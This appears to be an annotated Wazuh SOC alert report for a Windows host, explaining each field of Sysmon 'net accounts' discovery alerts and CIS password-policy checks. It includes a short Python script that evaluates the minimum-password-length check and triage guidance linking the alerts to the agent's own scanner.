No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be35-680a-030c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10832
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:59.252+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:59.252+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534519.2183679
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:57.4317579Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288458
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.425 ProcessGuid: {94294ddc-be35-680a-060c-000000000e00} ProcessId: 4616 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:57.425
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be35-680a-060c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4616
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from 'not applicable' to passed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from 'not applicable' to passed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:41:59.442+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:59.442+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from 'not applicable' to passed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19015
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['1.1.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['5.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534519.2188912
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26001
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting defines how long a user can use their password before it expires. Values for this policy setting range from 0 to 999 days. If you set the value to 0, the password will never expire. Because attackers can crack passwords, the more frequently you change the password the less opportunity an attacker has to use a cracked password. However, the lower this value is set, the higher the potential for an increase in calls to help desk support due to users having to change their password or forgetting which password is current. The recommended state for this setting is 365 or fewer days, but not 0. Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The longer a password exists the higher the likelihood that it will be compromised by a brute force attack, by an attacker gaining general knowledge about the user, or by the user sharing the password. Configuring the Maximum password age setting to 0 so that users are never required to change their passwords is a major security risk because that allows a compromised password to be used by the malicious user for as long as the valid user has authorized access.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to 365 or fewer days, but not 0: Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Maximum password age
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  1.1.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['net.exe accounts']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from 'not applicable' to failed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from 'not applicable' to failed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:59.829+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:59.829+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from 'not applicable' to failed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19014
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['1.1.4']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['5.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534519.2194244
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26003
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Minimum password length' is set to '14 or more character(s)'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines the least number of characters that make up a password for a user account. There are many different theories about how to determine the best password length for an organization, but perhaps 'passphrase' is a better term than 'password.' In Microsoft Windows 2000 and newer, passphrases can be quite long and can include spaces. Therefore, a phrase such as 'I want to drink a $5 milkshake' is a valid passphrase; it is a considerably stronger password than an 8 or 10 character string of random numbers and letters, and yet is easier to remember. Users must be educated about the proper selection and maintenance of passwords, especially with regard to password length. In enterprise environments, the ideal value for the Minimum password length setting is 14 characters, however you should adjust this value to meet your organization's business requirements. The recommended state for this setting is: 14 or more character(s). Note: In Windows Server 2016 and older versions of Windows Server, the GUI of the Local Security Policy (LSP), Local Group Policy Editor (LGPE) and Group Policy Management Editor (GPME) would not let you set this value higher than 14 characters. However, starting with Windows Server 2019, Microsoft changed the GUI to allow up to a 20 character minimum password length. Note #2: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Types of password attacks include dictionary attacks (which attempt to use common words and phrases) and brute force attacks (which try every possible combination of characters). Also, attackers sometimes try to obtain the account database so they can use tools to discover the accounts and passwords.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to 14 or more character(s): Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Minimum password length
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  1.1.4
Section of the CIS Benchmark this check implements (1.1.x = Password Policy). Quote it in the hardening ticket so the fix maps to the benchmark.

data.sca.check.compliance.cis_csc:  5.2
Cross‑reference to a CIS Critical Security Controls safeguard. The alert does not say which CSC edition the policy file targets, so confirm the edition before citing the safeguard by name.

data.sca.check.command:  ['net.exe accounts']
Command the SCA scanner ran on the endpoint to evaluate the check – reproduce it yourself when verifying. Note this is the very same `net.exe accounts` execution that trips the Sysmon EID 1 discovery rule in the alerts that follow; the scanner, not an intruder, is the source of those.

data.sca.check.result:  failed
passed / failed / not applicable. failed = the endpoint does not meet the benchmark and needs the remediation above.

data.sca.check.previous_result:  not applicable
Last run’s result for drift spotting. ‘not applicable’ here means no earlier result was recorded for this check, so there is no trend yet.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
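A way to verify check 26003 yourself from the same `net.exe accounts` output the scanner reads. This is an added example, not SOCscribe or Wazuh code; the rule shape it mimics (a numeric regex capture compared against a threshold) is how Wazuh's SCA numeric rules are commonly written and is assumed here rather than taken from the policy file, and both `net accounts` outputs are constructed samples, not captures from this report.

```python
import re
from typing import Callable, Dict, Optional, Tuple

# Constructed sample of `net.exe accounts` output from a workstation with no
# password policy applied (not captured from this report).
DEFAULT_POLICY = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          42
Minimum password length:                              0
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        WORKSTATION
The command completed successfully.
"""

# The same host after applying the GPO path from data.sca.check.remediation (constructed).
HARDENED_POLICY = DEFAULT_POLICY.replace(
    "Minimum password length:                              0",
    "Minimum password length:                              14",
)


def parse_net_accounts(text: str) -> Dict[str, str]:
    """Map each 'label:   value' line of `net accounts` to label -> value."""
    policy: Dict[str, str] = {}
    for line in text.splitlines():
        label, sep, value = line.partition(":")
        if sep:  # skips the trailing 'The command completed successfully.'
            policy[label.strip()] = value.strip()
    return policy


_OPS: Dict[str, Callable[[int, int], bool]] = {
    ">=": lambda a, b: a >= b, "<=": lambda a, b: a <= b,
    ">": lambda a, b: a > b, "<": lambda a, b: a < b,
    "==": lambda a, b: a == b, "!=": lambda a, b: a != b,
}


def evaluate_numeric_rule(output: str, regex: str, op: str, value: int) -> Tuple[str, Optional[int]]:
    """Evaluate one numeric SCA-style rule (regex capture compared with op/value)
    against raw command output. Returns (result, observed).
    A regex that does not match (for example 'None' where a number is expected)
    fails the check: the benchmark requirement was not demonstrated."""
    match = re.search(regex, output, re.MULTILINE)
    if match is None:
        return "failed", None
    observed = int(match.group(1))
    return ("passed" if _OPS[op](observed, value) else "failed"), observed


def check_26003(output: str) -> Tuple[str, Optional[int]]:
    """CIS 1.1.4 as SCA check 26003: Minimum password length >= 14."""
    return evaluate_numeric_rule(output, r"^Minimum password length:\s+(\d+)\s*$", ">=", 14)


if __name__ == "__main__":
    for name, out in (("default", DEFAULT_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, *check_26003(out))
```

Run it on real output by piping `net accounts` into a file on the endpoint; the non‑matching branch is the one to keep in mind, because fields such as ‘Length of password history maintained’ print ‘None’ rather than 0 when unset, and a regex that expects digits must fail them rather than skip them.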

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:00.196+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

T1087 – Account Discovery. `net accounts` enumerates the local password and lockout policy. This instance runs as NT AUTHORITY\SYSTEM from C:\Program Files (x86)\ossec-agent\ with net.exe as its parent, which is the shape of the Wazuh SCA scanner running its own `net.exe accounts` check (the SCA alert above lists that exact command). Before closing it, resolve parentProcessGuid to confirm the grandparent is wazuh-agent.exe; an interactive session, a shell parent (cmd.exe, powershell.exe) or a different working directory would make this genuine discovery activity.

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:00.196+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  12
How many times this rule has fired since the manager’s counter last reset. Across the four alerts in this report it climbs 12 → 15 within a quarter of a second, which matches a scanner looping over checks rather than a person typing commands.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534520.2200582
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the eventID below is a Sysmon ID, not a Security‑log ID.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider. This is Sysmon’s registered provider GUID; the same providerName with a different GUID would deserve a second look.

data.win.system.eventID:  1
Event ID within the provider. On the Sysmon channel 1 = Process Create; do not read it against the Security‑log table (4624, 4688).

data.win.system.version:  5
Schema version of this event type. Only matters when a parser expects an older field set.

data.win.system.level:  4
Numeric ETW level; 4 = Informational. Sysmon logs every process creation at this level, so it carries no risk signal by itself.

data.win.system.task:  1
Task category within the provider; for Sysmon it mirrors the event type (1 = Process Create).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:57.7743593Z
When the endpoint wrote the event (UTC, endpoint clock). The gap to `timestamp` above (about 2.4 s) is agent‑to‑manager latency; a large or negative gap points at clock skew.

data.win.system.eventRecordID:  288469
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event – the Sysmon service itself – not the process that was created (that is data.win.eventdata.processId).

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record; rarely needed.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in; open it in Event Viewer and jump to eventRecordID to see the original.

data.win.system.computer:  Attacker
Hostname Windows stamped on the event. Should match agent.name; a mismatch means the agent is forwarding another host’s logs.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.769 ProcessGuid: {94294ddc-be35-680a-080c-000000000e00} ProcessId: 10112 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be35-680a-060c-000000000e00} ParentProcessId: 4616 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
Sysmon’s rendered Process Create message. Every data.win.eventdata.* field below is parsed from it; fall back to this string if a parsed field looks truncated.

data.win.eventdata.utcTime:  2025-04-24 22:41:57.769
Process creation time (UTC) as recorded by Sysmon – the most precise timestamp in the alert.

data.win.eventdata.processGuid:  {94294ddc-be35-680a-080c-000000000e00}
Sysmon’s unique process identifier; it survives PID reuse and reboots. Pivot on it to find this process’s network (EID 3), file (EID 11) and child‑process events. The second and third groups encode the start time in Unix seconds, low word first: 0x680abe35 = 1745534517 = 2025‑04‑24 22:41:57Z, matching utcTime.

data.win.eventdata.processId:  10112
PID of the new process. PIDs are recycled, so prefer processGuid when correlating.

data.win.eventdata.image:  C:\Windows\SysWOW64\net1.exe
Full path of the executable. SysWOW64 is the 32‑bit copy on 64‑bit Windows, expected when the launcher is a 32‑bit process (the Wazuh agent lives in Program Files (x86)).

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
Version string from the PE resource; 10.0.26100 is the Windows 11 24H2 / Server 2025 build line.

data.win.eventdata.description:  Net Command
Description from the PE version resource. These strings can be copied into a malicious binary, so treat them as hints, not proof.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource; verify with the hash, not the string.

data.win.eventdata.originalFileName:  net1.exe
Name compiled into the PE resource. If it differs from the image’s file name the binary was renamed – a classic evasion.

data.win.eventdata.commandLine:  C:\WINDOWS\system32\net1 accounts
Full command line. `net accounts` prints the local password and lockout policy – the behaviour that maps to T1087. net.exe hands most subcommands to net1.exe, which is why both binaries show up.

data.win.eventdata.currentDirectory:  C:\Program Files (x86)\ossec-agent\
Working directory of the new process. Here it is the Wazuh agent’s install folder – a strong sign the agent’s SCA scan launched the command.

data.win.eventdata.user:  NT AUTHORITY\SYSTEM
Account the process runs as. SYSTEM with no interactive session is consistent with a service, not a logged‑on attacker.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
Sysmon identifier of the logon session; pivot on it to group every process from the same session. Its embedded time (ea7f-67fe) is about nine days before these events, i.e. the SYSTEM session from the last boot.

data.win.eventdata.logonId:  0x3e7
Windows logon ID. 0x3e7 (999) is the well‑known SYSTEM session, consistent with the user above.

data.win.eventdata.terminalSessionId:  0
Session 0 = services and other non‑interactive processes. An interactive user would be in session 1 or higher.

data.win.eventdata.integrityLevel:  System
Integrity level of the process token (System sits above High/Administrator).

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
Hash of the image on disk. Compare it with net1.exe on another host of the same build, or with a reputation service, to confirm it is the genuine Microsoft binary.

data.win.eventdata.parentProcessGuid:  {94294ddc-be35-680a-060c-000000000e00}
Sysmon GUID of the parent. Search for an EID 1 whose processGuid equals this to see who launched net.exe – this record alone does not tell you.

data.win.eventdata.parentProcessId:  4616
PID of the parent at creation time.

data.win.eventdata.parentImage:  C:\Windows\SysWOW64\net.exe
Executable of the parent. net.exe spawning net1.exe is normal; the question is what spawned net.exe.

data.win.eventdata.parentCommandLine:  net.exe accounts
Parent’s command line – the same `accounts` query, confirming net.exe is only passing the subcommand down.

